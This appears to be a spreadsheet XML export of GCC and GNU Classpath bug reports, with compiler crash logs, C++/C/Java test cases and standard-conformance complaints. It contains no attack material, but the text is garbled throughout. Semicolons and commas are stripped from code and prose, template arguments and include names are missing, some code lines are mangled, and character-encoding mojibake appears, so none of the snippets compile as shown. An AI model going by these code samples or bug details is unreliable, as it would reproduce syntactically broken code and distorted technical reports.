    <t>basic_string(ForwardIt ForwardIt) eventually calls _S_copy_chars() which is marked _GLIBCXX_NOEXCEPT so an exception thrown from an iterator operation inside _S_copy_chars() results in a call to std::terminate().
For instance:
#include
#include
struct hate_T_iterator : std::iterator {
    explicit hate_T_iterator(char* p) : p(p) {}
    char* p
    hate_T_iterator return *this }
    hate_T_iterator operator++(int) { auto r = *this ++*this return r }
    char else return *p }
    char* operator-&gt;() const { return p }
    bool operator== (hate_T_iterator other) const { return p == other.p}
    bool operator!= (hate_T_iterator other) const { return p != other.p}
}
int main(){
    char test_str[4] = ATA
    try {
        std::string s(hate_T_iterator{test_str} hate_T_iterator{test_str+3})
    }
    catch(...) {
    }
}</t>
  </si>
  <si>
    <t>GCC-33</t>
  </si>
  <si>
    <t>Wrong delete being called.</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Thu 15 Jul 1999 00:06:16 -0600
 The compiler says
 In method `void TPointer::TPointer (int) [with T = int]':
  instantiated from here
  `static void TPointerBase::operator delete (void *) 
         [with T= int]' is private within this context 
 even though no access is necessary in this context the check should
 be performed only in a delete-expression ([class.free])
 #include 
 template class TPointerBase {
   public:
   protected:
     TPointerBase(T* pointer) : P(pointer) {}
     TPointerBase() : P(0) {}
     T* P
   private:
     void* operator new(size_t) {return 0}  // prohibit use of new
     void operator delete(void* p) {((TPointerBase*)p)-&gt;P=0}
 }
 template class TPointer : public TPointerBase {
   public:
     TPointer() : TPointerBase() {}
     TPointer(T* pointer) : TPointerBase(pointer) {}
    ~TPointer() {delete P}
     TPointer P = src return *this}
     T* operator-&gt;() {return P}  // Could throw exception if P==0
 }
 int main()
 {
	 TPointer pi
	 return 0
 }
Release:
2.95.2</t>
  </si>
  <si>
    <t>CLASSPATH-22728</t>
  </si>
  <si>
    <t>InetAddress.getByName(ip) is not instanceof Inet4Address</t>
  </si>
  <si>
    <t>On Sun JRE InetAddress.getByName(127.0.0.1) is instanceof Inet4Address. On GNU classpath it is instanceof InetAddress.
Note also that InetAddress is defined as abstract in Java API so no public API method should return a InetAddress instance!</t>
  </si>
  <si>
    <t>GCC-19890</t>
  </si>
  <si>
    <t>gcc.dg/20020219-1.c execution test fails on ia64-hpux with -milp32</t>
  </si>
  <si>
    <t>The test gcc.dg/20020219-1.c execution test fails on ia64-hpux with -milp32.
Not a regression relative to 3.4.x.</t>
  </si>
  <si>
    <t>GCC-48189</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGFPE (division by zero) in in predict_loops () at predict.c:991 with --param max-predicted-iterations=0</t>
  </si>
  <si>
    <t>Created attachment 23708
reduced testcase
Compiler output:
$ gcc -O --param max-predicted-iterations=0 testcase.c
testcase.c: In function 'foo':
testcase.c:11:1: internal compiler error: Floating point exception
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Program received signal SIGFPE Arithmetic exception.
0x000000000080aab2 in predict_loops () at /mnt/svn/gcc-trunk/gcc/predict.c:991
991               probability = ((REG_BR_PROB_BASE + nitercst / 2) / nitercst)</t>
  </si>
  <si>
    <t>GCC-39264</t>
  </si>
  <si>
    <t>gnat.dg/pack3.adb fails on powerpc64/s390x</t>
  </si>
  <si>
    <t>When testing a 64 bits compiler ACATS is clean but gnat.dg has one FAIL:
http://gcc.gnu.org/ml/gcc-testresults/2009-02/msg02180.html
FAIL: gnat.dg/pack3.adb execution test
raised PROGRAM_ERROR : pack3.adb:29 explicit raise
pack3.adb test was introduced together with this patch:
2008-03-07  Eric Botcazou  
	* decl.c (gnat_to_gnu_entity) : Add
	comment for the packed array type case.
	* utils.c (build_template): Use a loop to strip padding or
	containing records for justified modular types.
To build on powerpc64 on debian etch one small patch is needed:
Index: configure
===================================================================
--- configure	(revision 144347)
+++ configure	(working copy)
@@ -333210 +33326 @@
 # in both places for now and restore CFLAGS at the end of config.
 save_CFLAGS=$CFLAGS
-# Add -Wall -Werror if we are using GCC.
-if test x$GCC = xyes then
-  XCFLAGS=$XCFLAGS -Wall -Werror
-fi
 # Find other programs we need.
 if test -n $ac_tool_prefix then
http://gcc.gnu.org/ml/gcc-testresults/2009-02/msg01865.html
Otherwise the build showing this FAIL is still available on compile farm gcc40 in /n/40/guerby/build-144347 and installed in /n/40/guerby/install-trunk-144347/bin . Configure:
export CC=gcc -m64
../trunk/configure --disable-nls --enable-__cxa_atexit --enable-threads=posix --with-mpfr=/opt/cfarm/mpfr-2.3.2-64 --enable-languages=cada --prefix=/n/40/guerby/install-trunk-144347 --with-long-double-128 --with-gmp=/opt/cfarm/gmp-4.2.4-64/
ssh public key can be added on request to my account (8h30 for bootstrap+check cada on gcc40).</t>
  </si>
  <si>
    <t>GCC-2508</t>
  </si>
  <si>
    <t>gcj crashed on boolean.class.getName()</t>
  </si>
  <si>
    <t>Compiling:
class Test
{
    public static void
    main(String anArg[])
    {
        System.out.println(boolean.class.getName())
    }
}
results in
Test.java: In class `Test':
Test.java: In method `Test.main(java.lang.String[])':
Test.java:7: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
GNU Java version 3.0 20010402 (prerelease) (i686-pc-linux-gnu)
Environment:
Linux Redhat 7.0
How-To-Repeat:
The file Test.java intermediate files and log file
are in the compressed tar file.
make -i &amp;&gt; log was used to generate the files</t>
  </si>
  <si>
    <t>p.thio</t>
  </si>
  <si>
    <t>GCC-64096</t>
  </si>
  <si>
    <t>std::list set and map violate a rule about allocator::construct</t>
  </si>
  <si>
    <t>According to the 23.2.1p3 C++11 Standard:
===========================================
For the components affected by this subclause that declare an allocator_type objects stored in these components shall be constructed using the allocator_traits::construct function and destroyed using the allocator_traits::destroy function (20.6.8.2). These functions
are called only for the containerâ€™s element type not for internal types used by the container. [ Note: This means for example that a node-based container might need to construct nodes containing aligned buffers and call construct to place the element into the buffer. â€”end note ]
===========================================
Here allocator_type is a direct template's type argument and allocator_traits just call allocator's construct method if it exists. However std::list set and map (and also multiset and multimap) violate this rule and call construct method from an allocator of rebinded type not of an original one. I know that we need rebinding for memory allocation but for construct call we should use original one. 23.2.1p13 also proves this:
===========================================
Given a container type X having an allocator_type identical to A and a value_type identical to T and given an lvalue m of type A a pointer p of type T* an expression v of type T and an rvalue rv of type T the following terms are defined. (If X is not allocator-aware the terms below are defined as if A were std::allocator.)
â€” T is CopyInsertable into X means that the following expression is well-formed: allocator_traits::construct(m p v)
â€” T is MoveInsertable into X means that the following expression is well-formed: allocator_traits::construct(m p rv)
â€” T is EmplaceConstructible into X from args for zero or more arguments args means that the following expression is well-formed: allocator_traits::construct(m p args)
===========================================
Now some code that confirms a bug:
===========================================
#include 
#include 
#include 
#include 
#include 
#include 
#include 
template
struct my_allocator : public std::allocator {
    my_allocator() noexcept {}
    template
    my_allocator(const my_allocator&amp; source) noexcept
        : std::allocator(source) {}
    template
    struct rebind {
        using other = my_allocator
    }
    template
    void construct(U* Args&amp;&amp;...) {
        static_assert(!std::is_same::value Wrong construct)
    }
}
template 
bool operator==(const my_allocator&amp; const my_allocator&amp;)
    { return true }
template 
bool operator!=(const my_allocator&amp; const my_allocator&amp;)
    { return false }
template
struct my_allocator : public std::allocator {
    my_allocator() noexcept {}
    template
    my_allocator(const my_allocator&amp; source) noexcept
        : std::allocator(source) {}
    template
    struct rebind {
        using other = my_allocator
    }
}
using map_int_int_value_type = std::map::value_type
template
struct my_allocator
: public std::allocator {
    my_allocator() noexcept {}
    template
    my_allocator(const my_allocator&amp; source) noexcept
        : std::allocator(source) {}
    template
    struct rebind {
        using other = my_allocator
    }
}
int main()
{
    {
        using container = std::vector&gt;
        container c
        c.emplace_back(0)
    }
    {
        using container = std::list&gt;
        container c
        c.emplace_back(0)
    }
    {
        using container = std::set my_allocator&gt;
        container c
        c.emplace(0)
    }
    {
        using container = std::multiset my_allocator&gt;
        container c
        c.emplace(0)
    }
    {
        using container = std::unordered_set
                std::equal_to my_allocator&gt;
        container c
        c.emplace(0)
    }
    {
        using container = std::unordered_multiset
                std::equal_to my_allocator&gt;
        container c
        c.emplace(0)
    }
    {
        using container = std::map
                my_allocator&gt;
        container c
        c.emplace(0 0)
    }
    {
        using container = std::multimap
                my_allocator&gt;
        container c
        c.emplace(0 0)
    }
    {
        using container = std::unordered_map
                std::equal_to my_allocator&gt;
        container c
        c.emplace(0 0)
    }
    {
        using container = std::unordered_multimap
                std::equal_to my_allocator&gt;
        container c
        c.emplace(0 0)
    }
    {
        using container = std::deque&gt;
        container c
        c.emplace_back(0)
    }
}
===========================================
We make a template allocator class that print static_assert error message when someone try to instantiate his construct method and then make 2 specializations of this class template (for int and for std::pair) which inherit construct method from std::allocator and so don't generate any error. The compiler's output is (I leave only important lines):
===========================================
main.cpp: In instantiation of 'void my_allocator::construct(U* Args T = std::_List_node]':
...
main.cpp:24:9: error: static assertion failed: Wrong construct
main.cpp: In instantiation of 'void my_allocator::construct(U* Args Args = {int} T = std::_Rb_tree_node]':
...
main.cpp:24:9: error: static assertion failed: Wrong construct
main.cpp: In instantiation of 'void my_allocator::construct(U* Args T = std::_Rb_tree_node &gt;]':
...
main.cpp:24:9: error: static assertion failed: Wrong construct
===========================================
As we can see std::list implementation tries to call construct for whole list node (U = std::_List_node) and std::set and map (and also multiset and multimap) call it for right type (int or std::pair) but from rebinded allocator (T = std::_Rb_tree_node). All other containers (std::vector std::deque and unordered ones) do everything right.</t>
  </si>
  <si>
    <t>palpatin91</t>
  </si>
  <si>
    <t>GCC-29341</t>
  </si>
  <si>
    <t>[4.2 regression] ICE: RTL flag check: INSN_DELETED_P used with unexpected rt x code 'plus' in output_constant_pool_1</t>
  </si>
  <si>
    <t>building glibc-2.5 on ia64-linux-gnu ok with current 4.1 20060929.
  Matthias
gcc -save-temps iso-2022-cn-ext.c -c -std=gnu99 -O2 -Wall -Winline -Wwrite-s
trings -fmerge-all-constants -fstrict-aliasing -g -pipe -Wstrict-prototypes -fPIC -I../include -I/home/p
ackages/glibc/glibc-2.5/build-tree/ia64-libc/iconvdata -I/home/packages/glibc/glibc-2.5/build-tree/ia64-
libc -I../sysdeps/ia64/elf -I../nptl/sysdeps/unix/sysv/linux/ia64 -I../sysdeps/unix/sysv/linux/ia64 -I..
/sysdeps/unix/sysv/linux/wordsize-64 -I../nptl/sysdeps/unix/sysv/linux -I../nptl/sysdeps/pthread -I../sy
sdeps/pthread -I../sysdeps/unix/sysv/linux -I../sysdeps/gnu -I../sysdeps/unix/common -I../sysdeps/unix/m
man -I../sysdeps/unix/inet -I../nptl/sysdeps/unix/sysv -I../sysdeps/unix/sysv -I../nptl/sysdeps/unix -I.
./sysdeps/unix -I../sysdeps/posix -I../sysdeps/ia64/fpu -I../nptl/sysdeps/ia64 -I../sysdeps/ia64 -I../sy
sdeps/wordsize-64 -I../sysdeps/ieee754/ldbl-96 -I../sysdeps/ieee754/dbl-64 -I../sysdeps/ieee754/flt-32 -
I../sysdeps/ieee754 -I../sysdeps/generic/elf -I../sysdeps/generic -I../nptl -I.. -I../libio -I. -nostdin
c -isystem /usr/lib/gcc-snapshot/lib/gcc/ia64-linux-gnu/4.2.0/include -isystem /home/packages/glibc/glib
c-2.5/debian/include -D_LIBC_REENTRANT -include ../include/libc-symbols.h -DPIC -DSHARED -DNOT_IN_libc -
D_ASM_IA64_CURRENT_H -o /home/packages/glibc/glibc-2.5/build-tree/ia64-libc/iconvdata/iso-2022-cn-ext.os
 -MD -MP -MF /home/packages/glibc/glibc-2.5/build-tree/ia64-libc/iconvdata/iso-2022-cn-ext.os.dt -MT /ho
me/packages/glibc/glibc-2.5/build-tree/ia64-libc/iconvdata/iso-2022-cn-ext.os
gcc: warning: -pipe ignored because -save-temps specified
In file included from iso-2022-cn-ext.c:654:
../iconv/loop.c: In function 'to_iso2022cn_ext_loop':
../iconv/loop.c:311: warning: pointer targets in passing argument 2 of 'ucs4_to_gb2312' differ in signed
ness
../iconv/loop.c:311: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l1' differ in si
gnedness
../iconv/loop.c:311: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l2' differ in si
gnedness
../iconv/loop.c:311: warning: pointer targets in passing argument 2 of 'ucs4_to_gb2312' differ in signed
ness
../iconv/loop.c:311: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l1' differ in si
gnedness
../iconv/loop.c: In function 'to_iso2022cn_ext_loop_single':
../iconv/loop.c:414: warning: pointer targets in passing argument 2 of 'ucs4_to_gb2312' differ in signed
ness
../iconv/loop.c:414: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l1' differ in si
gnedness
../iconv/loop.c:414: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l2' differ in si
gnedness
../iconv/loop.c:414: warning: pointer targets in passing argument 2 of 'ucs4_to_gb2312' differ in signed
ness
../iconv/loop.c:414: warning: pointer targets in passing argument 2 of 'ucs4_to_cns11643l1' differ in si
gnedness
../iconv/skeleton.c: In function 'gconv':
../iconv/skeleton.c:801: internal compiler error: RTL flag check: INSN_DELETED_P used with unexpected rt
x code 'plus' in output_constant_pool_1 at varasm.c:3400
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-21065</t>
  </si>
  <si>
    <t>javax.swing.event.EventListenerList.getListenerList() implemented wrong</t>
  </si>
  <si>
    <t>I am using a custom Class wich throws events by using this I rely on the
EventListenerList Class to hold my Eventlisteners. The Method getListenerList is
used by the method 
 protected void fireFooXXX() {
    // Guaranteed to return a non-null array
    Object[] listeners = listenerList.getListenerList()
    // Process the listeners last to first notifying
    // those that are interested in this event
    for (int i = listeners.length-2 i&gt;=0 i-=2) {
        if (listeners[i]==FooListener.class) {
            // Lazily create the event:
            if (fooEvent == null)
                fooEvent = new FooEvent(this)
            ((FooListener)listeners[i+1]).fooXXX(fooEvent)
        }
    }
}
which is the standard Method given in the API to fire Events to all
EventListeners. This Method relies on the correct implementation of
getListenerList() which should according to the API Documentation of Java by SUN
http://java.sun.com/j2se/1.5.0/docs/api/javax/swing/event/EventListenerList.html#getListenerList()
[quote]
getListenerList
public Object[] getListenerList()
    Passes back the event listener list as an array of ListenerType-listener
pairs. Note that for performance reasons this implementation passes back the
actual data structure in which the listener data is stored internally! This
method is guaranteed to pass back a non-null array so that no null-checking is
required in fire methods. A zero-length array of Object should be returned if
there are currently no listeners. WARNING!!! Absolutely NO modification of the
data contained in this array should be made -- if any such manipulation is
necessary it should be done on a copy of the array returned rather than the
array itself.
[/quote]
The API doc says Passes back the event listener list as an array of
ListenerType-listener pairs. my understanding of pairs is multiples of two so
the EventListenerList can never contain 1 or 3 entries or any other odd number.
But when adding one Eventlistener to such a list it really just adds this
EventListener resulting in a getListenerList() which returns one Element which
is simply wrong.
A Testcase will follow as soon as I have written one.
btw this is my system: WinXP SP2
                       gcj 4.0 20050324 from thisiscool.com
Regards
Andreas</t>
  </si>
  <si>
    <t>gruni.ca</t>
  </si>
  <si>
    <t>GCC-41743</t>
  </si>
  <si>
    <t>Missing loop optimisation</t>
  </si>
  <si>
    <t>Take the following example code:
void *memset(void *b int c unsigned long len)
{
        unsigned long i
        for (i = 0 i &lt; len i++)
                ((unsigned char *)b)[i] = c
        return b
}
-O2 generates:
memset:
        cmpwi 050
        beqlr 0
        mtctr 5
        rlwinm 4400xff
        li 90
        .p2align 415
.L3:
        stbx 439
        addi 991
        bdnz .L3
        blr
The use of GPR9 is unnecessary the loop could increment
GPR3 instead.</t>
  </si>
  <si>
    <t>GCC-64536</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Undefined .L* symbol starting with jump2 on s390x</t>
  </si>
  <si>
    <t>struct S { long q } *h
long a b g j k *c *d *e *f *i
long *baz (void)
{
  asm volatile ( : : : memory)
  return e
}
void
bar (int x)
{
  int y
  for (y = 0 y &lt; x y++)
    {
      switch (b)
        {
        case 0:
        case 2:
          a++
          break
        case 3:
          a++
          break
        case 1:
          a++
        }
      if (d)
        {
          f = baz ()
          g = k++
          if (&amp;h-&gt;q)
            {
              j = *f
              h-&gt;q = *f
            }
          else
            i = (long *) (h-&gt;q = *f)
          *c++ = (long) f
          e += 6
        }
      else
        {
          f = baz ()
          g = k++
          if (&amp;h-&gt;q)
            {
              j = *f
              h-&gt;q = *f
            }
          else
            i = (long *) (h-&gt;q = *f)
          *c++ = (long) f
          e += 6
        }
    }
}
int
main ()
{
  return 0
}
fails to link on s390x-linux with -O2 -m64 -fPIC starting with r199754.
For a tablejump we load of the jump_table_data label is hoisted before the loop then RA decides to spill it to stack (seems both with reload and lra) and then jump2 goes wild and deletes the casesi_jump instruction (and lots of other instructions it supposedly should not delete) but keeps the load of jump_table_data label (but the jump_table_data is gone).</t>
  </si>
  <si>
    <t>GCC-82511</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE Bad IO basetype (12) on attempted read or write of entire DEC structure</t>
  </si>
  <si>
    <t>Created attachment 42339
The program that when compiled illustrates the bug.
Minimal code that demonstrates the problem is in attached file bugbug.f.
Command line used to compile:
    gfortran -c -Wall -Wextra -fdec-structure -save-temps bugbug.f -o bugbug.o
Output from above command line:
    f951.exe: internal compiler error: Bad IO basetype (12)
    libbacktrace could not find executable to open
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
Output of gcc -v:
    Built by Equation Solution .
    Using built-in specs.
    COLLECT_GCC=gcc
    COLLECT_LTO_WRAPPER=c:/mingw8/bin/../libexec/gcc/x86_64-w64-
    mingw32/8.0.0/lto-wrapper.exe
    Target: x86_64-w64-mingw32
    Configured with: ../gcc-8-20171008-mingw/configure --host=x86_64-w64-
    mingw32 --build=x86_64-unknown-linux-gnu --target=x86_64-w64-mingw32 --
    prefix=/home/gfortran/gcc-home/binary/mingw32/native/x86_64/gcc/8-
    20171008 --with-sysroot=/home/gfortran/gcc-
    home/binary/mingw32/cross/x86_64/gcc/8-20170709 --with-
    gcc --with-gnu-ld --with-gnu-as --with-ld64=no --with-
    gmp=/home/gfortran/gcc-home/binary/mingw32/native/x86_64/gmp --with-
    mpfr=/home/gfortran/gcc-home/binary/mingw32/native/x86_64/mpfr --with-
    mpc=/home/gfortran/gcc-home/binary/mingw32/native/x86_64/mpc --with-
    cloog=/home/gfortran/gcc-home/binary/mingw32/native/x86_64/cloog --with-
    diagnostics-color=auto-if-env --enable-cloog-backend=isl --enable-
    targets=i686-w64-mingw32x86_64-w64-mingw32 --enable-lto 
    --enable-languages=cc++fortran --enable-threads=win32 --enable-static 
    --enable-shared=lto-plugin --enable-plugins --enable-ld=yes
    --enable-libquadmath
    --enable-libquadmath-support --enable-libgomp --disable-checking
    --disable-nls --disable-tls --disable-win32-registry
    Thread model: win32
    gcc version 8.0.0 20171008 (experimental) (GCC)
There are no preprocessor (*.i*) files generated.
System type: PC Windows 7 Professional 64-bit running 64-bit MinGW.
This bug also occurs in gfortran 7.1.0.
The code is admittedly incorrect (I should be reading into bucket.c16 instead of bucket) but instead of an ICE I should get a diagnostic with the location of the error.</t>
  </si>
  <si>
    <t>foreese</t>
  </si>
  <si>
    <t>James.A.Paget</t>
  </si>
  <si>
    <t>GCC-29090</t>
  </si>
  <si>
    <t>gcc.dg-struct-layout-1 failures on Darwin PPC at -m64</t>
  </si>
  <si>
    <t>I see a number of failures in the gcc.dg-struct-layout-1 testcases when executed after
being compiled at -m64. The exact failures are listed at...
 http://gcc.gnu.org/ml/gcc/2006-09/msg00211.html
I have modified gcc.dg/compat/struct-layout-1_test.h to just contain...
T(94struct atal16{}a)
and executed make check-gcc RUNTESTFLAGS=--target_board=unix'{-m64}' compat.exp
to obtain the commands for creating the files involved in this test case...
sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/ -w -DSKIP_DECIMAL_FLOAT -fno-show-column -c -m64 -save-temps -g -o c_compat_x_tst.o /sw/src/fink.build/gcc4-4.1.999-20060911/gcc-4.2-20060911/gcc/testsuite/gcc.dg/compat/struct-layout-1_x.c
/sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/ -DSKIP_DECIMAL_FLOAT -fno-show-column -c -g -m64 -save-temps -o c_compat_main_tst.o /sw/src/fink.build/gcc4-4.1.999-20060911/gcc-4.2-20060911/gcc/testsuite/gcc.dg/compat/struct-layout-1_main.c
/sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060911/darwin_objdir/gcc/ c_compat_main_tst.o c_compat_x_tst.o c_compat_y_tst.o -g -save-temps -fno-show-column -lm -m64 -o gcc-dg-compat-struct-layout-1-01
The resulting preprocessed and assembly files are provided. If anyone has an idea how to prune this down (the testcase is pretty complex) I would be willing to try.</t>
  </si>
  <si>
    <t>GCC-3308</t>
  </si>
  <si>
    <t>rwblob.c:171: Internal compiler error in change_address at emit-rtl.c:1635</t>
  </si>
  <si>
    <t>I was trying to run make tests on Imagemagick 5.3.5 which I
downloaded from www.imagemagick.org the make command succeeded
the make tests failed.
Making check in tests
make[1]: Entering directory `/usr/local/ImageMagick-5.3.5/tests'
make  rwblob rwfile
make[2]: Entering directory `/usr/local/ImageMagick-5.3.5/tests'
source='rwblob.c' object='rwblob.o' libtool=no \
depfile='.deps/rwblob.Po' tmpdepfile='.deps/rwblob.TPo' \
depmode=gcc /bin/sh ../depcomp \
gcc -O3 -mcpu=ultrasparc -DHAVE_CONFIG_H -I. -I. -I../magick -I../ -I.. -I../magick  -I/usr/local/include/freetype2 -I/usr/local/include/freetype2 -D_REENTRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/local/include  -g -O2 -Wall -c -o rwblob.o `test -f rwblob.c || echo './'`rwblob.c
rwblob.c: In function `main':
rwblob.c:43: warning: implicit declaration of function `exit'
rwblob.c:46: warning: implicit declaration of function `strcpy'
rwblob.c:145: warning: implicit declaration of function `strcmp'
rwblob.c:171: Internal compiler error in change_address at emit-rtl.c:1635
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [rwblob.o] Error 1
make[2]: Leaving directory `/usr/local/ImageMagick-5.3.5/tests'
make[1]: *** [check-am] Error 2
make[1]: Leaving directory `/usr/local/ImageMagick-5.3.5/tests'
Release:
gcc version 3.0 Thread model: solaris  --enable-threads=solaris --with-cpu=ultrasparc --disable-nls
Environment:
sparc-sun-solaris2.8</t>
  </si>
  <si>
    <t>andrew.catero</t>
  </si>
  <si>
    <t>GCC-22285</t>
  </si>
  <si>
    <t>__gnat_is_absolute_path: Segmentation fault</t>
  </si>
  <si>
    <t>../../gnatmake -c -I../rts -I. -I/test/gnu/gcc-3.3/gcc/gcc/ada gnatchop --GCC=.
./../xgcc -B../../ -g -O2 -mdisable-indexing     -gnatpg -gnata
raised STORAGE_ERROR : stack overflow or erroneous memory access
make[3]: *** [../../gnatchop] Error 1
make[3]: Leaving directory `/test/gnu/gcc-3.3/objdir/gcc/ada/tools'
make[2]: *** [gnattools-native] Error 2
# gdb ../../gnatmake
GNU gdb 6.3.50.20050210-cvs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hppa2.0w-hp-hpux11.11...
(gdb) r `cat xxx.sh`
Starting program: /test/gnu/gcc-3.3/objdir/gcc/gnatmake `cat xxx.sh`
Program received signal SIGSEGV Segmentation fault.
0x00142348 in __gnat_is_absolute_path ()
(gdb) disass 0x00142338 0x00142358
Dump of assembler code from 0x142338 to 0x142358:
0x00142338 :     bv r0(rp)
0x0014233c :     ldo -c0(sp)sp
0x00142340 : cmpib= 0r250x142354 &lt;
__gnat_is_absolute_path+20&gt;
0x00142344 : ldi 0ret0
0x00142348 : ldb 0(r26)ret0
0x0014234c :        cmpiclr 2fret0ret0
0x00142350 :        ldi 1ret0
0x00142354 :        bvn r0(rp)
End of assembler dump.
(gdb) p/x $r26
$1 = 0x0
(gdb) bt
#0  0x00142348 in __gnat_is_absolute_path ()
#1  0x00134720 in gnat__os_lib__is_absolute_path ()
#2  0x00112ec8 in tempdir___elabb ()
#3  0x00008a3c in adainit ()
#4  0x00008e90 in main ()
Null pointer passed from gnat__os_lib__is_absolute_path is the problem.</t>
  </si>
  <si>
    <t>GCC-53070</t>
  </si>
  <si>
    <t>ICE: in execute_cse_reciprocals at tree-ssa-math-opts.c:513 with -O -ffast-math -ftree-loop-if-convert -fno-tree-loop-im</t>
  </si>
  <si>
    <t>Created attachment 27215
reduced testcase
Compiler output:
$ gcc -O -ffast-math -ftree-loop-if-convert -fno-tree-loop-im testcase.c
testcase.c: In function 'foo':
testcase.c:2:1: internal compiler error: in execute_cse_reciprocals at tree-ssa-math-opts.c:513
 foo (int c)
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x12f1450 /mnt/svn/gcc-trunk/gcc/tree-ssa-math-opts.c line=513 function=0x12f1710 execute_cse_reciprocals)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:1006
#1  0x0000000000b07d3e in execute_cse_reciprocals () at /mnt/svn/gcc-trunk/gcc/tree-ssa-math-opts.c:513
#2  0x0000000000913627 in execute_one_pass (pass=0x180ba60) at /mnt/svn/gcc-trunk/gcc/passes.c:2176
#3  0x00000000009139e5 in execute_pass_list (pass=0x180ba60) at /mnt/svn/gcc-trunk/gcc/passes.c:2231
#4  0x00000000009139f7 in execute_pass_list (pass=0x1808e40) at /mnt/svn/gcc-trunk/gcc/passes.c:2232
#5  0x00000000006c00be in tree_rest_of_compilation (node=Unhandled dwarf expression opcode 0xfa
) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1860
#6  0x00000000006c3302 in cgraph_expand_function (node=0x7ffff5a85780) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1930
#7  0x00000000006c5529 in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1995
#8  cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2685
#9  0x00000000006c5b1a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2769
#10 0x000000000059f770 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:10053
#11 0x00000000009fef4c in compile_file () at /mnt/svn/gcc-trunk/gcc/toplev.c:572
#12 do_compile () at /mnt/svn/gcc-trunk/gcc/toplev.c:1938
#13 toplev_main (argc=16 argv=0x7fffffffd708) at /mnt/svn/gcc-trunk/gcc/toplev.c:2014
#14 0x00007ffff61ba2ad in __libc_start_main () from /lib64/libc.so.6
#15 0x0000000000582d01 in _start ()
Tested revisions:
r186657 - crash</t>
  </si>
  <si>
    <t>GCC-68727</t>
  </si>
  <si>
    <t>[5/6/7 regression] invalid offsetof expressions accepted</t>
  </si>
  <si>
    <t>While coming up with a comprehensive test case for c++/68711 I noticed that GCC silently accepts other invalid offsetof expressions that then cause the ill-formed program to crash at runtime (below).  Since this problem is not caused by the merge of the C++ delayed folding branch or a regression from GCC 5.1 I raise it a bug of its own.  While strictly speaking GCC's behavior isn't non-conforming because the expressions have undefined behavior since GCC otherwise makes an effort to detect and diagnose such constructs and in the past did diagnose these this is a defect in the implementation.
$ /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -Wall -Wextra -Wpedantic x.cpp
tmp$ 
tmp$ cat x.cpp &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -Wall -Wextra -Wpedantic x.cpp &amp;&amp; ./a.out 
struct A { int i }
struct B: virtual A { }
__SIZE_TYPE__ a[] = {
    !&amp;((B*)0)-&gt;A::i
    __builtin_offsetof (B A::i)
}
int main ()
{
    return a[0] + a[1]
}
Segmentation fault (core dumped)
$ 
The absence of diagnostics on these expressions is a regression from 4.9.3 which issues the following warnings.  (It also successfully compiles the program that then crashes at runtime).  
x.cpp:5:19: warning: invalid access to non-static data member â€˜A::iâ€™  of NULL object [-Winvalid-offsetof]
     !&amp;((B*)0)-&gt;A::i
                   ^
x.cpp:5:19: warning: (perhaps the â€˜offsetofâ€™ macro was used incorrectly) [-Winvalid-offsetof]
x.cpp:6:31: warning: invalid access to non-static data member â€˜A::iâ€™  of NULL object [-Winvalid-offsetof]
     __builtin_offsetof (B A::i)
                               ^
x.cpp:6:31: warning: (perhaps the â€˜offsetofâ€™ macro was used incorrectly) [-Winvalid-offsetof]</t>
  </si>
  <si>
    <t>GCC-47067</t>
  </si>
  <si>
    <t>[4.6 Regression] [c++0x] ICE in cxx_eval_bare_aggregate at cp/semantics.c:6352</t>
  </si>
  <si>
    <t>$ cat test.cpp 
struct X {
    virtual void x()
    virtual ~X()
}
struct Y {
    virtual void y()
    virtual ~Y()
}
struct Z: X Y {} z
$ g++ test.cpp -c -std=c++0x
test.cpp:11:19:   in constexpr expansion of 'z.Z::Z()'
test.cpp:11:19: internal compiler error: in cxx_eval_bare_aggregate at cp/semantics.c:6352
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ svn info | egrep Revision
Revision: 168275
In http://gcc.gnu.org/bugzilla/show_bug.cgi?id=46626#c10 Jakub Jelinek said:
&gt; I see the ICE with the second testcase from #c8 back till r166167.</t>
  </si>
  <si>
    <t>GCC-6311</t>
  </si>
  <si>
    <t>BigInteger Constructor Creates False Results (crypto failures?).</t>
  </si>
  <si>
    <t>This could cause Java cryptographic methods to fail.  It only fails on certain numbers.
I haven't looked at the source to determine the cause of the failure.
Release:
3.0.4
Environment:
Installing 3.x gcc tools including gcj from the Mandrake 8.2 release installation disk
How-To-Repeat:
